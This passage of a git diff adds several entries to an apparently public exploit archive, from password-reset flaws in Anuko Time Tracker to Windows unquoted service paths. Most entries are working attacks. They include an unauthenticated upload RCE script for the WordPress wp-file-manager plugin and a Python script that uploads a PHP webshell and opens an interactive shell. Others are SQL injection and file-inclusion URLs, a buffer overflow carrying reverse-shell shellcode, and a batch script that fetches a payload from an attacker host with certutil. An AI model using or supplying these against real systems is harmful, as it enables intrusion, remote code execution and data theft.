+Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the
+password reset module which allows attackers to perform Denial of Service
+attack on any legitimate user's mailbox. Attacker could perform Denial of
+Service on a legitimate user's mailbox
+To exploit this vulnerability:
+
+   1. Goto 'Password Reset' module and enter any user's login name
+   2. Click on 'Reset Password' and capture this request.
+   3. Replay this request n number of times.
+   4. The victim receives a password reset email the number of times the
+   request is replayed.
\ No newline at end of file
diff --git a/exploits/php/webapps/49174.txt b/exploits/php/webapps/49174.txt
new file mode 100644
index 000000000..1f4db7aa2
--- /dev/null
+++ b/exploits/php/webapps/49174.txt
@@ -0,0 +1,20 @@
+#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover
+#Date: 2020-11-11
+#Exploit Author: Mufaddal Masalawala
+#Vendor Homepage: https://www.anuko.com/
+#Software Link: https://www.anuko.com/time-tracker/index.htm
+#Version: 1.19.23.5311
+#Tested on: Kali Linux 2020.3
+#CVE: CVE-2020-27422
+#Proof Of Concept:
+In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link
+emailed to the user doesn't expire once used, hence the attacker could use
+the same link to take over the victim's account. An Attacker needs to have
+the link for successful exploitation. A malicious user could use the same
+password reset link of the victim multiple times to take over the account.
+To exploit this vulnerability:
+
+   1. Goto 'Password Reset' module and enter any user's login name
+   2. Reset the password using the password reset link received in the email
+   3. Use the same link again after resetting the password once
+   4. Password is changed again using the previously used link.
\ No newline at end of file
diff --git a/exploits/php/webapps/49175.txt b/exploits/php/webapps/49175.txt
new file mode 100644
index 000000000..393b6cef4
--- /dev/null
+++ b/exploits/php/webapps/49175.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion
+# Date: 30-10-2020
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
+# Version: 1.0
+# Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian)
+# CVE ID : N/A
+
+# Local File Inclusion
+#parameter Vulnerable: page
+
+#Request
+
+GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+
+
+#Response 
+
+HTTP/1.1 200 OK
+
+Date: Sat, 31 Oct 2020 02:49:31 GMT
+Server: Apache/2.4.46 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 15674
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+ <main class="">
+
+        PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo=       
+
+</main>
\ No newline at end of file
diff --git a/exploits/php/webapps/49177.txt b/exploits/php/webapps/49177.txt
new file mode 100644
index 000000000..7b0c999ee
--- /dev/null
+++ b/exploits/php/webapps/49177.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
+# Date: 22-10-2020
+# Exploit Author: Mosaaed 
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: parrot + Apache/2.4.46 (Debian)
+
+SQL Injection
+#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4
+
+#POC 1: 
+http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--
+
+LFI
+#Vulnerable Page1: http://localhost/carRental/index.php?page=about
+#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement
+
+#POC 1:
+
+http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home
+
+#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect
+
+note POC 2 reading database information
+
+#example : 
+curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1
+
+#result
+
+<main id="view-panel" >
+        	PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K
+
+#proof of concept picture
+
+https://ibb.co/8Dd7d9G
\ No newline at end of file
diff --git a/exploits/php/webapps/49178.bash b/exploits/php/webapps/49178.bash
new file mode 100644
index 000000000..023215694
--- /dev/null
+++ b/exploits/php/webapps/49178.bash
@@ -0,0 +1,134 @@
+# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
+# Date: September 4,2020
+# Exploit Author: Mansoor R (@time4ster)
+# Version Affected: 6.0 to 6.8
+# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
+# Patch: Upgrade to wp-file-manager 6.9
+# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip)
+
+#Description:
+#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
+
+#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
+
+#Patch commit details:
+# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
+
+#Credits:
+#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
+#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
+
+#!/bin/bash
+
+echo
+echo "============================================================================================"
+echo "wp-file-manager wordpress plugin Unauthenticated RCE Exploit    By: Mansoor R (@time4ster)"
+echo "============================================================================================"
+echo
+
+function printHelp()
+{
+	echo -e "
+Usage:
+
+-u|--wp_url				Wordpress target url
+-f|--upload_file			Absolute location of local file to upload on the target.
+-k|--check				Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
+-v|--verbose				Also prints curl command which is going to be executed
+-h|--help				Print Help menu
+
+
+Example:
+./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
+./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
+"
+}
+
+check="false"
+verbose="false"
+#Processing arguments
+while [[ "$#" -gt 0 ]]
+do
+key="$1"
+
+case "$key" in
+    -u|--wp_url)
+	    wp_url="$2"
+	    shift
+	    shift # past argument
+	    ;;
+    -f|--upload_file)
+	    upload_file="$2"
+	    shift
+	    shift
+	    ;;
+    -k|--check)
+	    check="true"
+	    shift
+	    shift
+	    ;;
+    -v|--verbose)
+	    verbose="true"
+	    shift
+	    ;;
+    -h|--help)
+	    printHelp
+	    exit
+	    shift
+	    ;;
+    *)   
+	    echo [-] Enter valid options
+	    exit
+	    ;;
+esac
+done
+
+[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit 
+[[ ! -s "$upload_file" ]] && [[ "$check" == "false" ]]  && echo "[-] Either supply --upload_file or --check" && exit
+
+#Script have dependency on jq
+jq_cmd=$(command -v jq)
+[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
+
+function checkWPFileManager()
+{										#Takes 1 argument: url
+	url="$1"
+	target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+	
+	response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
+	#echo "$response"
+	#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
+	is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
+	[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
+	[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"	
+}
+
+function exploitWPFileManager()
+{										#Takes 3 arguments: url & file_upload & verbose(true/false)
+	declare url="$1"
+	declare file_upload="$2"
+	declare verbose="$3"
+	target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+
+	if [ "$verbose" == "true" ];then
+		echo "curl POC :"
+		echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\"  -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
+		echo
+	fi
+
+	response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw"  -F "mtime[]=1576045135" \
+		-F "upload[]=@/$file_upload" \
+		"$target_endpoint" )
+       #echo "$response"
+       file_upload_url=$(echo "$response" | jq -r .added[0].url  2>/dev/null)
+	[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation:  $file_upload_url "
+	[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
+}	
+
+
+[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
+[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
+
+echo
\ No newline at end of file
diff --git a/exploits/php/webapps/49181.txt b/exploits/php/webapps/49181.txt
new file mode 100644
index 000000000..70d02200e
--- /dev/null
+++ b/exploits/php/webapps/49181.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Coastercms 5.8.18 - Stored XSS
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.coastercms.org/
+# Software Link: https://www.coastercms.org/
+# Version: 5.8.18
+# Tested on Windows 10
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit Page tab
+
+Steps to reproduce:
+1: Navigate to "http://localhost/admin/login" and log in with
+admin credentials.
+2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
+click on the edit page.
+3: Then add the payload "<script>alert(123)</script>" & Payload
+"<h1>test</h1>", and cliock on update button. Saved succesfully.
+4: Now, click on "View live page" and it will redirect you to the live page
+at "http://localhost/homepage/blog" and XSS will get stored and
+trigger on the main home page
\ No newline at end of file
diff --git a/exploits/php/webapps/49183.py b/exploits/php/webapps/49183.py
new file mode 100755
index 000000000..f2b082ac6
--- /dev/null
+++ b/exploits/php/webapps/49183.py
@@ -0,0 +1,94 @@
+# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
+# Exploit Author: Valerio Alessandroni
+# Date: 2020-10-07
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
+# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
+# Version: 1.0
+# Tested On: Server Linux Ubuntu 18.04, Apache2
+# Version: Python 2.x
+# Impact: Code Execution
+# Affected components: Affected move_uploaded_file() function in functions.php file.
+# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
+#
+# Additional information:
+#
+# To exploit this vulnerability:
+# 1) register a not privileged user at /register.php
+# 2) login in the application /login.php
+# 3) keep note of the redirect with the GET 'id' parameter  /userhome.php?id=[ID]
+# 4) go to the page /photouploader.php?id=[ID]
+# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
+# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
+# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
+#
+# How to use it:
+# python exploit.py [URL] [USERNAME] [PASSWORD]
+
+
+import requests, sys, urllib, re, time
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL, ID, FILE_NAME):
+    try:
+        print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
+        time.sleep(1)
+        WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
+        getCMD  = {'cmd': 'echo ciao'}
+        r2 = requests.get(WEB_SHELL, params=getCMD)
+        status = r2.status_code
+        if status != 200:
+            print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+            r2.raise_for_status()
+        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+        while True:
+             
+             inputCMD = raw_input('$ ')
+             command = {'cmd': inputCMD}
+             r2 = requests.get(WEB_SHELL, params=command, verify=False)
+             print r2.text
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+def printHeader():
+     print(Fore.GREEN+"___  ___              _  _          _ "+Fore.RED+"     ______  _____  _____")
+     print(Fore.GREEN+"|  \/  |             (_)| |        | |"+Fore.RED+"     | ___ \/  __ \|  ___|")
+     print(Fore.GREEN+"| .  . |  __ _  _ __  _ | |_  __ _ | |"+Fore.RED+"     | |_/ /| /  \/| |__  ")
+     print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+"     |    / | |    |  __| ")
+     print(Fore.GREEN+"| |  | || (_| || |   | || |_| (_| || |"+Fore.RED+"     | |\ \ | \__/\| |___ ")
+     print(Fore.GREEN+"\_|  |_/ \__,_||_|   |_| \__|\__,_||_|"+Fore.RED+"     \_| \_| \____/\____/ ")
+     print ''                                                       
+
+
+
+if __name__ == "__main__":
+    printHeader()
+    if len(sys.argv) != 4:
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    SERVER_URI = SERVER_URL + 'auth/auth.php'
+    LOGIN_PARAMS = {'user': '1'}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
+    print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
+    time.sleep(1)
+    for resp in req.history:
+        COOKIES = resp.cookies.get_dict()
+        SPLITTED = resp.headers["location"].split("=")
+        ID = SPLITTED[1]
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
+    time.sleep(1)
+    SERVER_URI = SERVER_URL + 'photouploader.php'
+    LOGIN_PARAMS = {'id': ID}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    FILE_NAME = 'shell.php'
+    FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
+    time.sleep(1)
+    webshell(SERVER_URL, ID, FILE_NAME)
\ No newline at end of file
diff --git a/exploits/windows/local/49134.py b/exploits/windows/local/49134.py
new file mode 100755
index 000000000..3a03b5172
--- /dev/null
+++ b/exploits/windows/local/49134.py
@@ -0,0 +1,92 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
+# Date: 2020-09-02
+# Exploit Author: Sectechs
+# Vendor Homepage: https://www.10-strike.com
+# Version: 8.65
+# Tested on: Windows 7 x86 SP1 
+
+import os
+import sys
+import struct
+import socket
+
+
+crash ="A"* 209 
+
+# jmp short 8
+# kali@root:msf-nasm_shell
+# nasm> jmp short 8
+Next_SE_Pointer = "\xeb\x06\x90\x90"
+# 61e8497a
+SE_Handler="\x7a\x49\xe8\x61"
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed 
+payload = (
+"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
+"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
+"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
+"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
+"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
+"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
+"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
+"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
+"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
+"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
+"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
+"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
+"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
+"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
+"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
+"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
+"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
+"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
+"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
+"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
+"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
+"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
+"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
+"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
+"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
+"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
+"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
+"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
+"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
+"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
+"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
+"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
+"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
+"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
+"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
+"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
+"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
+"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
+"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
+"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
+"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
+"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
+"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
+"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
+"\x68\x55\x41\x41")
+buffer = crash + Next_SE_Pointer + SE_Handler  + "\x90" * 20 +  payload  + "\x90" * 200
+f=open("PoC6.txt","w")
+	
+f.write(buffer)
+f.close()
+'''
+  ----------------------------------
+  | NEXT SEH Pointer               |
+--|------ ESP                      |     |     < ------- A * 209
+| |---------------------------------     |
+| | SE_Handler        ▲            |     |
+| |   #POP #POP #RET  |            |     |  
+| | -------------------------------|     |
+|					 ▼ Stack
+|
+|
+|______ ► -------------------------
+         |      PAYLOAD            | -------- ► call | KALI |
+         __________________________
+
+'''
\ No newline at end of file
diff --git a/exploits/windows/local/49141.txt b/exploits/windows/local/49141.txt
new file mode 100644
index 000000000..30fe25add
--- /dev/null
+++ b/exploits/windows/local/49141.txt
@@ -0,0 +1,24 @@
+#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-27-11
+#Vendor :  SEIKO EPSON Corp
+#Version : EPSON_PM_RPCV4_06 8.0
+#Vendor Homepage : https://epson.com
+#Tested on OS: Windows 7 Pro
+
+#Analyze PoC :
+==============
+C:\>sc qc EPSON_PM_RPCV4_06
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3
+SSRP\E_S60RPB.EXE
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : EPSON V3 Service4(06)
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49142.txt b/exploits/windows/local/49142.txt
new file mode 100644
index 000000000..642415721
--- /dev/null
+++ b/exploits/windows/local/49142.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe'  Unquoted Service Path
+# Discovery by: Emmanuel Lujan
+# Discovery Date: 2020-11-26
+# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
+# Tested Version: 1.0.0.3
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 7 Home Premium x64 
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+GREGService                                                             GREGServ
+ice                                   C:\Program Files (x86)\Acer\Registration\G
+REGsvc.exe                                                Auto
+
+# Service info:
+
+C:\>sc qc GregService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: GREGService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START  
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : GREGService
+        DEPENDENCIES       :                            
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49143.txt b/exploits/windows/local/49143.txt
new file mode 100644
index 000000000..9f227172a
--- /dev/null
+++ b/exploits/windows/local/49143.txt
@@ -0,0 +1,73 @@
+# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
+# Discovery by: Jok3r
+# Discovery Date: 2020-09-14
+# Vendor Homepage: https://home.pearsonvue.com/
+# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
+# Tested Version: 2.3.1911
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+#Description:
+
+The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server.
+VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights.
+
+# Detection of unquoted service path:
+
+C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
+VUE Application Wrapper
+VUEApplicationWrapper C:\Pearson VUE\VUE
+Testing System\bin\VUEWrapper.exe
+Auto
+
+C:\Users\VUEService>sc qc VUEApplicationWrapper
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VUEApplicationWrapper
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : VUE Application Wrapper
+DEPENDENCIES : lanmanworkstation
+SERVICE_START_NAME : .\VUEService
+
+
+#Detection of insecure file permissions:
+
+PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
+
+
+Directory: C:\
+
+
+Path Owner Access
+---- ----- ------
+Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
+
+
+#Exploit code:
+
+ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
+wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+sc qc VUEApplicationWrapper
+powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
+ECHO [+] Enumeration was completed successfully.
+::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
+::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe
+ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
+certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe"
+ECHO [*] Downloading VUE executable...
+PAUSE
+IF EXIST "C:\Pearson VUE\VUE.exe" (
+ECHO [+] The download was successful.
+) ELSE (
+ECHO [-] The download was unsuccessful.
+PAUSE
+)
+ECHO [!] If you continue, system will be rebooted.
+PAUSE
+shutdown /r /t 0
+::code end
\ No newline at end of file
diff --git a/exploits/windows/local/49144.bat b/exploits/windows/local/49144.bat
new file mode 100644
index 000000000..c7d8181ef
--- /dev/null
+++ b/exploits/windows/local/49144.bat
@@ -0,0 +1,44 @@
+# Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
+# Date: 2020-08-28
